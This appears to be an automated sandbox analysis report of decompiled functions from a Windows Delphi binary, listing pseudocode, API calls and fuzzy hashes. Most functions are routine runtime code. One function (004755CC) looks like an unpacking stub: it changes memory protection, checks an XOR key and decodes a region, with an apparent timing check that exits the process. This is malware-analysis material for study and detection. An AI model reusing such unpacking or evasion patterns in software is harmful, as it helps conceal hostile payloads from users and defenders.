Download Yara Rule

C-Code - Quality: 84%

			E00452F50(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				void* _t63;
				char _t64;
				void* _t74;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				_t74 = __edi;
				_t64 = __edx;
				if(__edx != 0) {
					_t77 = _t77 + 0xfffffff0;
					_t25 = E00403940(_t25, _t76);
				}
				_v5 = _t64;
				_t62 = _t25;
				E0041C178(_t63, 0);
				_t28 =  *0x490f64; // 0x476458
				 *((intOrPtr*)(_t28 + 4)) = _t62;
				 *_t28 = 0x4532f4;
				_t29 =  *0x490f70; // 0x476460
				 *((intOrPtr*)(_t29 + 4)) = _t62;
				 *_t29 = 0x453300;
				E0045330C(_t62);
				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t62 + 0x4c)) = E004035AC(1);
				 *((intOrPtr*)(_t62 + 0x50)) = E004035AC(1);
				 *((intOrPtr*)(_t62 + 0x54)) = E004035AC(1);
				 *((intOrPtr*)(_t62 + 0x58)) = E004035AC(1);
				_t42 = E004035AC(1);
				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
				L00406EA4();
				_t75 = _t42;
				L00406B8C();
				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
				L00407114();
				_t11 = _t62 + 0x58; // 0x44c3d06e
				_t45 =  *0x4910a4; // 0x492ab8
				 *((intOrPtr*)( *_t45))(0, 0, E0044F7D4,  *_t11, 0, _t75, _t75, 0x5a, 0);
				 *((intOrPtr*)(_t62 + 0x84)) = E0041F22C(1);
				 *((intOrPtr*)(_t62 + 0x88)) = E0041F22C(1);
				 *((intOrPtr*)(_t62 + 0x80)) = E0041F22C(1);
				E0045372C(_t62, _t62, _t63, _t74);
				_t15 = _t62 + 0x84; // 0x38004010
				_t56 =  *_t15;
				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
				 *((intOrPtr*)(_t56 + 8)) = 0x453608;
				_t18 = _t62 + 0x88; // 0x90000000
				_t57 =  *_t18;
				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
				 *((intOrPtr*)(_t57 + 8)) = 0x453608;
				_t21 = _t62 + 0x80; // 0xac000000
				_t58 =  *_t21;
				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
				 *((intOrPtr*)(_t58 + 8)) = 0x453608;
				_t59 = _t62;
				if(_v5 != 0) {
					E00403998(_t59);
					_pop( *[fs:0x0]);
				}
				return _t62;
			}

0x00452f50
0x00452f50
0x00452f58
0x00452f5a
0x00452f5d
0x00452f5d
0x00452f62
0x00452f65
0x00452f6b
0x00452f70
0x00452f75
0x00452f78
0x00452f7e
0x00452f83
0x00452f86
0x00452f8e
0x00452f9a
0x00452fa9
0x00452fb8
0x00452fc7
0x00452fd6
0x00452fe0
0x00452fe5
0x00452fea
0x00452fef
0x00452ff4
0x00452ff9
0x00452fff
0x00453004
0x00453012
0x00453019
0x00453027
0x00453039
0x0045304b
0x00453053
0x00453058
0x00453058
0x0045305e
0x00453061
0x00453068
0x00453068
0x0045306e
0x00453071
0x00453078
0x00453078
0x0045307e
0x00453081
0x00453088
0x0045308e
0x00453090
0x00453095
0x0045309c
0x004530a5

APIs

GetKeyboardLayout.USER32 ref: 00452F95
72E7AC50.USER32(00000000,00000000,?,?,00000000,?,00440E0E,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 00452FEA
72E7AD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,00440E0E,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 00452FF4
72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,00440E0E,00000000,00000000,?,00000000,?), ref: 00452FFF

Strings

XdG, xrefs: 00452F70
`dG, xrefs: 00452F7E

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: B380KeyboardLayout
String ID: XdG$`dG
API String ID: 648844651-2051946594
Opcode ID: 2fd11fd8e630cee1da4b3216cba2d8a4f29a7d045d4c2127422d3f30164f92eb
Instruction ID: a1bd7cd623584787cd69cb3d3028c543d3de16661c23c3d8af0999e187b8e534
Opcode Fuzzy Hash: 2fd11fd8e630cee1da4b3216cba2d8a4f29a7d045d4c2127422d3f30164f92eb
Instruction Fuzzy Hash: 4B31FAB46516409FD740EF69DCC1B887BE4AB05359F0480BAE908DF367D77AA908CF18

Uniqueness

Uniqueness Score: -1.00%

Function 0045372C, Relevance: 10.6, APIs: 7, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0045372C(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x492c04 != 0) {
					_t54 =  *0x492c04; // 0x2410d40
					_v5 =  *((intOrPtr*)(_t54 + 0x88));
				}
				_push(_t74);
				_push(0x453871);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x492c04 != 0) {
					_t52 =  *0x492c04; // 0x2410d40
					E00455B40(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E0041F5BC( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E0041F5BC( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0xac000000
					E0041F6A0( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E0041F5BC( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0xac000000
					E0041F5BC( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E0041F5BC( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0xac000000
				E0041F400( *_t16, 0x80000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E0041F400( *_t17, 0x80000007);
				 *[fs:eax] = 0x80000007;
				_push(0x453878);
				if( *0x492c04 != 0) {
					_t38 =  *0x492c04; // 0x2410d40
					return E00455B40(_t38, _v5);
				}
				return 0;
			}

0x0045372c
0x0045372d
0x0045372f
0x00453736
0x00453738
0x00453743
0x00453745
0x00453750
0x00453750
0x00453755
0x00453756
0x0045375b
0x0045375e
0x00453768
0x0045376c
0x00453771
0x00453771
0x00453787
0x004537a3
0x004537aa
0x004537b0
0x00453789
0x0045378d
0x00453794
0x0045379a
0x0045379a
0x004537b5
0x004537cc
0x004537d3
0x00453809
0x00453814
0x0045381b
0x00453822
0x00453828
0x004537d5
0x004537dc
0x004537e3
0x004537e9
0x004537f5
0x004537fc
0x00453802
0x00453802
0x0045382d
0x00453838
0x0045383d
0x00453848
0x00453852
0x00453855
0x00453861
0x00453866
0x00000000
0x0045386b
0x00453870

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00453780
CreateFontIndirectA.GDI32(?), ref: 0045378D
GetStockObject.GDI32(0000000D), ref: 004537A3

Part of subcall function 0041F6A0: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F6AD

SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 004537CC
CreateFontIndirectA.GDI32(?), ref: 004537DC
CreateFontIndirectA.GDI32(?), ref: 004537F5
GetStockObject.GDI32(0000000D), ref: 0045381B

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFontIndirect$InfoObjectParametersStockSystem
String ID:
API String ID: 2891467149-0
Opcode ID: 98616ab8f6d9abe34e636c37f226d4eff00a51b2a12bf5a117eb49641acfee1c
Instruction ID: 6bd9ad4d31924b99b51aa544d21399d5d680fff9bd20fef1580424f470487bef
Opcode Fuzzy Hash: 98616ab8f6d9abe34e636c37f226d4eff00a51b2a12bf5a117eb49641acfee1c
Instruction Fuzzy Hash: AA31C870644204ABDB14FF69CC46B9A33E5AB44305F4080BBFD08DB297DEB8994D8B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00401AA0, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401AA0() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401B56);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4925c4);
				L004013F4();
				if( *0x492049 != 0) {
					_push(0x4925c4);
					L004013FC();
				}
				E00401464(0x4925e4);
				E00401464(0x4925f4);
				E00401464(0x492620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x49261c = _t11;
				if( *0x49261c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x49261c; // 0x51cb40
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x492608)) = 0x492604;
					 *0x492604 = 0x492604;
					 *0x492610 = 0x492604;
					 *0x4925bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401B5D);
				if( *0x492049 != 0) {
					_push(0x4925c4);
					L00401404();
					return 0;
				}
				return 0;
			}

0x00401aa5
0x00401aa6
0x00401aab
0x00401aae
0x00401ab1
0x00401ab6
0x00401ac2
0x00401ac4
0x00401ac9
0x00401ac9
0x00401ad3
0x00401add
0x00401ae7
0x00401af3
0x00401af8
0x00401b04
0x00401b06
0x00401b0b
0x00401b0b
0x00401b13
0x00401b17
0x00401b18
0x00401b24
0x00401b27
0x00401b29
0x00401b2e
0x00401b2e
0x00401b37
0x00401b3a
0x00401b3d
0x00401b49
0x00401b4b
0x00401b50
0x00000000
0x00401b50
0x00401b55

APIs

RtlInitializeCriticalSection.KERNEL32(004925C4,00000000,00401B56,?,?,0040233A,024114A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AB6
RtlEnterCriticalSection.KERNEL32(004925C4,004925C4,00000000,00401B56,?,?,0040233A,024114A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AC9
LocalAlloc.KERNEL32(00000000,00000FF8,004925C4,00000000,00401B56,?,?,0040233A,024114A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AF3
RtlLeaveCriticalSection.KERNEL32(004925C4,00401B5D,00000000,00401B56,?,?,0040233A,024114A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401B50

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: fd89d7f316c00e9fc37230e2ae352ed365b05c61ac4687af6cf5c9e8685d94cb
Instruction ID: 95e3ad14cd8e77daeaecc4888ebbb2b959e38f942476f89c2b71d2eae05b4240
Opcode Fuzzy Hash: fd89d7f316c00e9fc37230e2ae352ed365b05c61ac4687af6cf5c9e8685d94cb
Instruction Fuzzy Hash: 2B01A1B06446407EEB1AAB2A9A16B197AA0D714704F05803BE100A6AF2E6FC5845CF2E

Uniqueness

Uniqueness Score: -1.00%

Function 0042727C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0042727C(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x492ac4 == 0) {
					 *0x492a9c = E00427194(0, _t8,  *0x492a9c, _t17, _t18);
					_t7 =  *0x492a9c(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}

0x00427280
0x0042728a
0x0042729e
0x004272a4
0x00000000
0x004272a4
0x004272ac
0x004272b4
0x004272b4
0x004272b7
0x004272cb
0x004272b9
0x004272b9
0x004272cf
0x004272bb
0x004272bb
0x004272bb
0x004272bc
0x004272d3
0x004272be
0x004272bf
0x004272c2
0x004272c4
0x004272c4
0x004272c2
0x004272bc
0x004272b9
0x004272d8
0x004272db
0x004272e5
0x004272dd
0x00000000
0x004272de

APIs

GetSystemMetrics.USER32 ref: 004272DE

Part of subcall function 00427194: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427214

KiUserCallbackDispatcher.NTDLL ref: 004272A4

Strings

GetSystemMetrics, xrefs: 0042728C

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCallbackDispatcherMetricsProcSystemUser
String ID: GetSystemMetrics
API String ID: 54681038-96882338
Opcode ID: 0c26782bd003c680462a4f7e02363b1f8c577a652b25e792e5475779f882d3f7
Instruction ID: 0c54ae4e5e3beb960f0165100a1caa746b2001f93ff8537b215b7333a5855368
Opcode Fuzzy Hash: 0c26782bd003c680462a4f7e02363b1f8c577a652b25e792e5475779f882d3f7
Instruction Fuzzy Hash: 85F0963271C571DAC7204A75BE855233646A766330FE0C7B7F511866D6C27C9841923D

Uniqueness

Uniqueness Score: -1.00%

Function 0040218C, Relevance: 3.1, APIs: 2, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 00401AA0: RtlInitializeCriticalSection.KERNEL32(004925C4,00000000,00401B56,?,?,0040233A,024114A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AB6
Part of subcall function 00401AA0: RtlEnterCriticalSection.KERNEL32(004925C4,004925C4,00000000,00401B56,?,?,0040233A,024114A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AC9
Part of subcall function 00401AA0: LocalAlloc.KERNEL32(00000000,00000FF8,004925C4,00000000,00401B56,?,?,0040233A,024114A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AF3
Part of subcall function 00401AA0: RtlLeaveCriticalSection.KERNEL32(004925C4,00401B5D,00000000,00401B56,?,?,0040233A,024114A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401B50

RtlEnterCriticalSection.KERNEL32(004925C4,00000000,00402308), ref: 004021D7
RtlLeaveCriticalSection.KERNEL32(004925C4,0040230F), ref: 00402302

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID:
API String ID: 2227675388-0
Opcode ID: 397014a9b8109deb088ae44c44fc9d75e61629f80145026641b15c91bd4c6105
Instruction ID: 12c3e6705103f5bed30ecc7535e63a959ecd02f91ac4101ba1b6501cf45c8c55
Opcode Fuzzy Hash: 397014a9b8109deb088ae44c44fc9d75e61629f80145026641b15c91bd4c6105
Instruction Fuzzy Hash: D34111B2A00600AFD714CF69DF95629B7A0FB65324B15417FD801E7BE2E6B8AC01CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 004015B8, Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015B8(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E0040146C(0x4925e4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x004015bb
0x004015c5
0x004015d4
0x004015c7
0x004015c7
0x004015c7
0x004015da
0x004015e7
0x004015ec
0x004015ee
0x004015f2
0x004015fb
0x00401602
0x0040160e
0x00401615
0x00000000
0x00401615
0x00401602
0x0040161a

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018C1), ref: 004015E7
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018C1), ref: 0040160E

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 76e836fd95c562362f206a6cee2c1b3dd0eb72172e7f0547a6e7433b27dd2c69
Instruction ID: 5f734080e0c6898504fbed57d043c79a80c0a66a4bd47801b0e21cc9b2d0ee82
Opcode Fuzzy Hash: 76e836fd95c562362f206a6cee2c1b3dd0eb72172e7f0547a6e7433b27dd2c69
Instruction Fuzzy Hash: 3DF02E72B003202BEB30556A0CC1B5369C49F85764F190477FD4CFF3D9D6764C004259

Uniqueness

Uniqueness Score: -1.00%

Function 004755CC, Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004755CC(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				long _v8;
				void* __ebx;
				void* __ecx;
				signed int _t22;
				signed int _t29;
				intOrPtr* _t31;

				_t31 = _a4;
				if(E00475588( *((intOrPtr*)( *_t31))) == 0) {
					if(E004755C0( *((intOrPtr*)( *_t31))) == 0) {
						return 0;
					}
					 *((intOrPtr*)( *(_t31 + 4) + 0xb8)) = 0x475574;
					return 0xffffffffffffffff;
				}
				_t22 =  *(_t31 + 4);
				if(( *(_t22 + 0xa8) ^ 0x000aed2e) != 0x3f745) {
					return 0;
				}
				VirtualProtectEx(0xffffffff,  *(_t22 + 0xac), 0x13cb5, 4,  &_v8); // executed
				E004756B4(_t31,  *((intOrPtr*)( *(_t31 + 4) + 0xac)), 0x13cb5, __edi, __esi, 0x1a080, 0x476e18);
				_t29 =  *(_t31 + 4);
				 *((intOrPtr*)(_t29 + 0xb8)) =  *((intOrPtr*)(_t29 + 0xb8)) + 0x3283;
				return _t29 | 0xffffffff;
			}

0x004755d1
0x004755df
0x00475651
0x00000000
0x00475666
0x0047565b
0x00000000
0x00475661
0x004755e1
0x004755f6
0x00000000
0x00475642
0x0047560c
0x0047562b
0x00475630
0x00475633
0x00000000

APIs

Part of subcall function 00475588: GetSystemTime.KERNEL32 ref: 0047558F
Part of subcall function 00475588: ExitProcess.KERNEL32(00000000), ref: 0047559E
Part of subcall function 00475588: GetNextDlgTabItem.USER32(00000000,00000000,00000000), ref: 004755B4

VirtualProtectEx.KERNEL32(000000FF,?,00013CB5,00000004,?), ref: 0047560C

Part of subcall function 004756B4: GetNextDlgTabItem.USER32(00000000,00000000,00000000), ref: 004756DF

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemNext$ExitProcessProtectSystemTimeVirtual
String ID:
API String ID: 3234653472-0
Opcode ID: a4aa576997493bf57116bfdc1c070e249d4816c36d3c8b245ddef3406778fff9
Instruction ID: 683db2bf605079b025cb99da7a3986bab2d689136ca3cf0b0fc224d54438be29
Opcode Fuzzy Hash: a4aa576997493bf57116bfdc1c070e249d4816c36d3c8b245ddef3406778fff9
Instruction Fuzzy Hash: 3F11A534604600EFDB40DF24C881EE273E5EB05724F64C6A6B91C5F3A6D6B4ED05CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040731A, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040731A(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}

0x00407345
0x0040734c

APIs

CreateWindowExA.USER32 ref: 00407345

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4185589135e2d0d8a1c3fe1e13e4309022baba8be44e6f9ece8cfaf062a63ca3
Instruction ID: 3ae3b0bb6aa290208680c541b8da8ad6351dd4405c79d6abd1241d14a227bfc1
Opcode Fuzzy Hash: 4185589135e2d0d8a1c3fe1e13e4309022baba8be44e6f9ece8cfaf062a63ca3
Instruction Fuzzy Hash: A7E002B2204309BFEB00DE8ADCC1DABB7ACFB4C654F854115BB1C97242D275AD608B71

Uniqueness

Uniqueness Score: -1.00%

Function 0040731C, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040731C(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}

0x00407345
0x0040734c

APIs

CreateWindowExA.USER32 ref: 00407345

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b901072617b8609411aa665ed91509b478441abd6de2cb5ea206074649d503f6
Instruction ID: 109ed22ea2e506524b14edc0d0bd377e8b92066772ad28182da1425e8690dcbf
Opcode Fuzzy Hash: b901072617b8609411aa665ed91509b478441abd6de2cb5ea206074649d503f6
Instruction Fuzzy Hash: F7E002B2204309BFDB00DE8ADCC1DABB7ACFB4C654F854105BB1C972429275AD608B71

Uniqueness

Uniqueness Score: -1.00%

Function 00405A64, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A64(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x400000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E00405CA0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x400000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x400000
				return  *_t7;
			}

0x00405a6c
0x00405a72
0x00405a7e
0x00405a82
0x00405a8b
0x00405a90
0x00405a92
0x00405a97
0x00405a99
0x00405a9c
0x00405a9c
0x00405a97
0x00405a9f
0x00405aaa

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004104AC,00405ACC,00406578,0000FF99,?,00000400,?,004104AC,0041416B,00000000,00414190), ref: 00405A82

Part of subcall function 00405CA0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047608C,?,00405A90,00400000,?,00000105,00000001,004104AC,00405ACC,00406578,0000FF99,?), ref: 00405CBC
Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047608C,?,00405A90,00400000,?,00000105,00000001), ref: 00405CDA
Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047608C), ref: 00405CF8
